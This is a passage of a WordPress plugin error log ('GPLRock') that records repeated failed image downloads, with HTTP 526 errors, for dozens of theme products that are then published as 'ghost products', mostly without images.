https://meldwp.com/wp-content/uploads/deaxautt---digital-marketing--agency-wordpress-theme-16984.webp [05-Apr-2026 14:55:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: deaxautt-digital-marketing-agency-wordpress-theme [05-Apr-2026 14:55:21 UTC] GPLRock: Image download failed for product saasmax-saas-startup-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:55:23 UTC] GPLRock: Image download failed for product saasmax-saas-startup-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:55:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/saasmax---saas-startup-wordpress-theme-29712.webp for product saasmax-saas-startup-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:55:25 UTC] GPLRock: Image download failed for product saasmax-saas-startup-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:55:28 UTC] GPLRock: Image download failed for product saasmax-saas-startup-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:55:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/saasmax---saas-startup-wordpress-theme-29712.webp for product saasmax-saas-startup-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:55:30 UTC] GPLRock WARNING: Image download failed for product saasmax-saas-startup-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/saasmax---saas-startup-wordpress-theme-29712.webp [05-Apr-2026 14:55:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: saasmax-saas-startup-wordpress-theme [05-Apr-2026 14:55:30 UTC] GPLRock: Image download failed for product hibiscus-alternative-medicine-and-organic-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:55:32 UTC] GPLRock: Image download failed for product hibiscus-alternative-medicine-and-organic-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:55:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hibiscus---alternative-medicine-and-organic-shop-wordpress-theme-30549.webp for product hibiscus-alternative-medicine-and-organic-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:55:34 UTC] GPLRock: Image download failed for product hibiscus-alternative-medicine-and-organic-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:55:36 UTC] GPLRock: Image download failed for product hibiscus-alternative-medicine-and-organic-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:55:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hibiscus---alternative-medicine-and-organic-shop-wordpress-theme-30549.webp for product hibiscus-alternative-medicine-and-organic-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:55:39 UTC] GPLRock WARNING: Image download failed for product hibiscus-alternative-medicine-and-organic-shop-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/hibiscus---alternative-medicine-and-organic-shop-wordpress-theme-30549.webp [05-Apr-2026 14:55:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hibiscus-alternative-medicine-and-organic-shop-wordpress-theme [05-Apr-2026 14:55:39 UTC] GPLRock: Image download failed for product cloudy-7-hosting-service-whmcs-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:55:41 UTC] GPLRock: Image download failed for product cloudy-7-hosting-service-whmcs-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:55:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cloudy-7---hosting-service--whmcs-wordpress-theme-14320.webp for product cloudy-7-hosting-service-whmcs-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:55:43 UTC] GPLRock: Image download failed for product cloudy-7-hosting-service-whmcs-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:55:45 UTC] GPLRock: Image download failed for product cloudy-7-hosting-service-whmcs-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:55:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cloudy-7---hosting-service--whmcs-wordpress-theme-14320.webp for product cloudy-7-hosting-service-whmcs-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:55:47 UTC] GPLRock WARNING: Image download failed for product cloudy-7-hosting-service-whmcs-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/cloudy-7---hosting-service--whmcs-wordpress-theme-14320.webp [05-Apr-2026 14:55:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cloudy-7-hosting-service-whmcs-wordpress-theme [05-Apr-2026 14:55:47 UTC] GPLRock: Image downloaded successfully for product blank-elegant-minimalist-blog-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-eccf7ee2.webp [05-Apr-2026 14:55:47 UTC] GPLRock: Using pre-downloaded image for product blank-elegant-minimalist-blog-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-eccf7ee2.webp [05-Apr-2026 14:55:47 UTC] GPLRock: Ghost product published with image - Product ID: blank-elegant-minimalist-blog-wordpress-theme [05-Apr-2026 14:55:47 UTC] GPLRock: Image download failed for product sellegance-responsive-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:55:50 UTC] GPLRock: Image download failed for product sellegance-responsive-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:55:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sellegance---responsive-woocommerce-theme-32375.webp for product sellegance-responsive-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:55:52 UTC] GPLRock: Image download failed for product sellegance-responsive-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:55:54 UTC] GPLRock: Image download failed for product sellegance-responsive-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:55:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sellegance---responsive-woocommerce-theme-32375.webp for product sellegance-responsive-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:55:56 UTC] GPLRock WARNING: Image download failed for product sellegance-responsive-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/sellegance---responsive-woocommerce-theme-32375.webp [05-Apr-2026 14:55:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sellegance-responsive-woocommerce-theme [05-Apr-2026 14:55:56 UTC] GPLRock: Image download failed for product kroth-businessconsulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:55:58 UTC] GPLRock: Image download failed for product kroth-businessconsulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:56:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kroth---businessconsulting-wordpress-theme-15441.webp for product kroth-businessconsulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:56:01 UTC] GPLRock: Image download failed for product kroth-businessconsulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:56:03 UTC] GPLRock: Image download failed for product kroth-businessconsulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:56:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kroth---businessconsulting-wordpress-theme-15441.webp for product kroth-businessconsulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:56:05 UTC] GPLRock WARNING: Image download failed for product kroth-businessconsulting-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/kroth---businessconsulting-wordpress-theme-15441.webp [05-Apr-2026 14:56:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kroth-businessconsulting-wordpress-theme [05-Apr-2026 14:58:38 UTC] GPLRock: Image download failed for product hello-friday-elegant-lifestyle-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:58:40 UTC] GPLRock: Image download failed for product hello-friday-elegant-lifestyle-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:58:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hello-friday---elegant-lifestyle-blog-theme-27390.webp for product hello-friday-elegant-lifestyle-blog-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:58:42 UTC] GPLRock: Image download failed for product hello-friday-elegant-lifestyle-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:58:44 UTC] GPLRock: Image download failed for product hello-friday-elegant-lifestyle-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:58:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hello-friday---elegant-lifestyle-blog-theme-27390.webp for product hello-friday-elegant-lifestyle-blog-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:58:46 UTC] GPLRock WARNING: Image download failed for product hello-friday-elegant-lifestyle-blog-theme. URL: https://meldwp.com/wp-content/uploads/hello-friday---elegant-lifestyle-blog-theme-27390.webp [05-Apr-2026 14:58:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hello-friday-elegant-lifestyle-blog-theme [05-Apr-2026 14:58:46 UTC] GPLRock: Image downloaded successfully for product vosio-creative-wordpress-portfolio (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fcef7b80.webp [05-Apr-2026 14:58:46 UTC] GPLRock: Using pre-downloaded image for product vosio-creative-wordpress-portfolio: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fcef7b80.webp [05-Apr-2026 14:58:46 UTC] GPLRock: Ghost product published with image - Product ID: vosio-creative-wordpress-portfolio [05-Apr-2026 14:58:46 UTC] GPLRock: Image download failed for product nurseryplant-responsive-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:58:48 UTC] GPLRock: Image download failed for product nurseryplant-responsive-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:58:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nurseryplant---responsive-woocommerce-wordpress-theme-986.webp for product nurseryplant-responsive-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:58:51 UTC] GPLRock: Image download failed for product nurseryplant-responsive-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:08:48 UTC] GPLRock: Image download failed for product knirpse-kindergarten-school-baby-care-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:08:50 UTC] GPLRock: Image download failed for product knirpse-kindergarten-school-baby-care-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:08:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/knirpse--kindergarten-school--baby-care-wordpress-theme-26012.webp for product knirpse-kindergarten-school-baby-care-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:08:52 UTC] GPLRock: Image download failed for product knirpse-kindergarten-school-baby-care-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:08:54 UTC] GPLRock: Image download failed for product knirpse-kindergarten-school-baby-care-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:08:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/knirpse--kindergarten-school--baby-care-wordpress-theme-26012.webp for product knirpse-kindergarten-school-baby-care-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:08:56 UTC] GPLRock WARNING: Image download failed for product knirpse-kindergarten-school-baby-care-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/knirpse--kindergarten-school--baby-care-wordpress-theme-26012.webp [05-Apr-2026 15:08:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: knirpse-kindergarten-school-baby-care-wordpress-theme [05-Apr-2026 15:08:57 UTC] GPLRock: Image download failed for product xara-responsive-woocommerce-shop-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:08:59 UTC] GPLRock: Image download failed for product xara-responsive-woocommerce-shop-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:09:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/xara---responsive-woocommerce-shop-theme-32089.webp for product xara-responsive-woocommerce-shop-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:09:01 UTC] GPLRock: Image download failed for product xara-responsive-woocommerce-shop-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:09:03 UTC] GPLRock: Image download failed for product xara-responsive-woocommerce-shop-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:09:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/xara---responsive-woocommerce-shop-theme-32089.webp for product xara-responsive-woocommerce-shop-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:09:05 UTC] GPLRock WARNING: Image download failed for product xara-responsive-woocommerce-shop-theme. URL: https://meldwp.com/wp-content/uploads/xara---responsive-woocommerce-shop-theme-32089.webp [05-Apr-2026 15:09:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: xara-responsive-woocommerce-shop-theme [05-Apr-2026 15:09:05 UTC] GPLRock: Image download failed for product techlife-mobile-tech-electronics-repair-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:09:07 UTC] GPLRock: Image download failed for product techlife-mobile-tech-electronics-repair-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:09:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/techlife---mobile-tech--electronics-repair-shop-wordpress-theme-25197.webp for product techlife-mobile-tech-electronics-repair-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:09:10 UTC] GPLRock: Image download failed for product techlife-mobile-tech-electronics-repair-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:09:12 UTC] GPLRock: Image download failed for product techlife-mobile-tech-electronics-repair-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:09:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/techlife---mobile-tech--electronics-repair-shop-wordpress-theme-25197.webp for product techlife-mobile-tech-electronics-repair-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:09:14 UTC] GPLRock WARNING: Image download failed for product techlife-mobile-tech-electronics-repair-shop-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/techlife---mobile-tech--electronics-repair-shop-wordpress-theme-25197.webp [05-Apr-2026 15:09:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: techlife-mobile-tech-electronics-repair-shop-wordpress-theme [05-Apr-2026 15:09:14 UTC] GPLRock: Image download failed for product clever-course-education-lms-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:09:16 UTC] GPLRock: Image download failed for product clever-course-education-lms-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:09:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/clever-course---education--lms-wordpress-1562.webp for product clever-course-education-lms-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:09:19 UTC] GPLRock: Image download failed for product clever-course-education-lms-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:09:21 UTC] GPLRock: Image download failed for product clever-course-education-lms-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:09:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/clever-course---education--lms-wordpress-1562.webp for product clever-course-education-lms-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:09:23 UTC] GPLRock WARNING: Image download failed for product clever-course-education-lms-wordpress. URL: https://meldwp.com/wp-content/uploads/clever-course---education--lms-wordpress-1562.webp [05-Apr-2026 15:09:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: clever-course-education-lms-wordpress [05-Apr-2026 15:09:24 UTC] GPLRock: Image download failed for product liviza-immigration-consulting-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:09:26 UTC] GPLRock: Image download failed for product liviza-immigration-consulting-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:09:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/liviza---immigration-consulting-wordpress-theme--rtl-23157.webp for product liviza-immigration-consulting-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:09:28 UTC] GPLRock: Image download failed for product liviza-immigration-consulting-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:09:30 UTC] GPLRock: Image download failed for product liviza-immigration-consulting-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:09:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/liviza---immigration-consulting-wordpress-theme--rtl-23157.webp for product liviza-immigration-consulting-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:09:32 UTC] GPLRock WARNING: Image download failed for product liviza-immigration-consulting-wordpress-theme-rtl. URL: https://meldwp.com/wp-content/uploads/liviza---immigration-consulting-wordpress-theme--rtl-23157.webp [05-Apr-2026 15:09:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: liviza-immigration-consulting-wordpress-theme-rtl [05-Apr-2026 15:09:32 UTC] GPLRock: Image download failed for product auto-spa-car-wash-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:09:34 UTC] GPLRock: Image download failed for product auto-spa-car-wash-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:09:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/auto-spa---car-wash-wordpress-theme-3568.webp for product auto-spa-car-wash-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:09:37 UTC] GPLRock: Image download failed for product auto-spa-car-wash-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:09:39 UTC] GPLRock: Image download failed for product auto-spa-car-wash-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:09:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/auto-spa---car-wash-wordpress-theme-3568.webp for product auto-spa-car-wash-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:09:41 UTC] GPLRock WARNING: Image download failed for product auto-spa-car-wash-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/auto-spa---car-wash-wordpress-theme-3568.webp [05-Apr-2026 15:09:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: auto-spa-car-wash-wordpress-theme [05-Apr-2026 15:09:41 UTC] GPLRock: Image download failed for product grecko-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:09:43 UTC] GPLRock: Image download failed for product grecko-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:09:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/grecko--business-wordpress-theme-13439.webp for product grecko-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:09:45 UTC] GPLRock: Image download failed for product grecko-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:09:47 UTC] GPLRock: Image download failed for product grecko-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:09:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/grecko--business-wordpress-theme-13439.webp for product grecko-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:09:50 UTC] GPLRock WARNING: Image download failed for product grecko-business-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/grecko--business-wordpress-theme-13439.webp [05-Apr-2026 15:09:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: grecko-business-wordpress-theme [05-Apr-2026 15:09:50 UTC] GPLRock: Image download failed for product senion-senior-care-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:09:52 UTC] GPLRock: Image download failed for product senion-senior-care-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:09:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/senion---senior-care-wordpress-theme-32779.webp for product senion-senior-care-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:09:54 UTC] GPLRock: Image download failed for product senion-senior-care-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:09:56 UTC] GPLRock: Image download failed for product senion-senior-care-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:09:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/senion---senior-care-wordpress-theme-32779.webp for product senion-senior-care-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:09:58 UTC] GPLRock WARNING: Image download failed for product senion-senior-care-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/senion---senior-care-wordpress-theme-32779.webp [05-Apr-2026 15:09:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: senion-senior-care-wordpress-theme [05-Apr-2026 15:09:58 UTC] GPLRock: Image download failed for product digi-electronics-store-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:10:00 UTC] GPLRock: Image download failed for product digi-electronics-store-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:10:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/digi---electronics-store-woocommerce-theme-9981.webp for product digi-electronics-store-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:10:03 UTC] GPLRock: Image download failed for product digi-electronics-store-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:10:05 UTC] GPLRock: Image download failed for product digi-electronics-store-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:10:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/digi---electronics-store-woocommerce-theme-9981.webp for product digi-electronics-store-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:10:07 UTC] GPLRock WARNING: Image download failed for product digi-electronics-store-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/digi---electronics-store-woocommerce-theme-9981.webp [05-Apr-2026 15:10:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: digi-electronics-store-woocommerce-theme [05-Apr-2026 15:10:07 UTC] GPLRock: Image download failed for product quiety-software-it-solutions-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:10:09 UTC] GPLRock: Image download failed for product quiety-software-it-solutions-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:10:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/quiety--software--it-solutions-wordpress-theme-19053.webp for product quiety-software-it-solutions-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:10:11 UTC] GPLRock: Image download failed for product quiety-software-it-solutions-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:10:14 UTC] GPLRock: Image download failed for product quiety-software-it-solutions-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:10:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/quiety--software--it-solutions-wordpress-theme-19053.webp for product quiety-software-it-solutions-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:10:16 UTC] GPLRock WARNING: Image download failed for product quiety-software-it-solutions-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/quiety--software--it-solutions-wordpress-theme-19053.webp [05-Apr-2026 15:10:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: quiety-software-it-solutions-wordpress-theme [05-Apr-2026 15:10:48 UTC] GPLRock: Image download failed for product astrum-responsive-multi-purpose-html-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:10:50 UTC] GPLRock: Image download failed for product astrum-responsive-multi-purpose-html-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:10:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/astrum---responsive-multi-purpose-html-template-21881.webp for product astrum-responsive-multi-purpose-html-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:10:52 UTC] GPLRock: Image download failed for product astrum-responsive-multi-purpose-html-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:10:55 UTC] GPLRock: Image download failed for product astrum-responsive-multi-purpose-html-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:10:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/astrum---responsive-multi-purpose-html-template-21881.webp for product astrum-responsive-multi-purpose-html-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:10:57 UTC] GPLRock WARNING: Image download failed for product astrum-responsive-multi-purpose-html-template. URL: https://meldwp.com/wp-content/uploads/astrum---responsive-multi-purpose-html-template-21881.webp [05-Apr-2026 15:10:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: astrum-responsive-multi-purpose-html-template [05-Apr-2026 15:10:57 UTC] GPLRock: Image download failed for product influencer-magazine-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:10:59 UTC] GPLRock: Image download failed for product influencer-magazine-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:11:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/influencer---magazine--blog-wordpress-theme-28583.webp for product influencer-magazine-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:11:01 UTC] GPLRock: Image download failed for product influencer-magazine-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:11:03 UTC] GPLRock: Image download failed for product influencer-magazine-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:11:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/influencer---magazine--blog-wordpress-theme-28583.webp for product influencer-magazine-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:11:06 UTC] GPLRock WARNING: Image download failed for product influencer-magazine-blog-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/influencer---magazine--blog-wordpress-theme-28583.webp [05-Apr-2026 15:11:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: influencer-magazine-blog-wordpress-theme [05-Apr-2026 15:11:06 UTC] GPLRock: Image download failed for product labomba-responsive-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:11:08 UTC] GPLRock: Image download failed for product labomba-responsive-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:11:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/labomba---responsive-multipurpose-wordpress-theme-13071.webp for product labomba-responsive-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:11:10 UTC] GPLRock: Image download failed for product labomba-responsive-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:11:12 UTC] GPLRock: Image download failed for product labomba-responsive-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:11:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/labomba---responsive-multipurpose-wordpress-theme-13071.webp for product labomba-responsive-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:11:14 UTC] GPLRock WARNING: Image download failed for product 